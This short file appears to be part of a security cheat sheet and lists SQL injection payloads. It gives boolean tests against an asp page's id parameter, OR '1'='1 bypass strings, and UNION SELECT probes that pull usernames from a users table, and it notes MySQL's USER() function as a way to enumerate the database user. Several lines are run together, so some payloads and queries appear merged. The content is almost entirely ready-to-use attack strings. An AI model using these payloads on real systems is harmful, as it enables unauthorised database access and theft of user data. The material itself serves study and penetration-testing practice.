brianlam38/Sec-Cheatsheets/6843_Payloads.md

 page.asp?id=1' or 1=1 -- true
 page.asp?id=1" or 1=1 -- true
 page.asp?id=1 and 1=2 -- false

+/* Probes: existence of databases, values */
+' OR '1'='1
+' UNION SELECT 1 FROM users'
+' UNION SELECT username FROM users WHERE username LIKE '% SELECT * FROM users WHERE username='' OR '1'='1' SELECT * FROM users WHERE username='' UNION SELECT 1 FROM users SELECT * FROM users WHERE username='' UNION SELECT username FROM users WHERE username LIKE '%'

 /* Enumerate username string */
 -- Note: USER() is a MySQL function to return the current user and hostname as a string.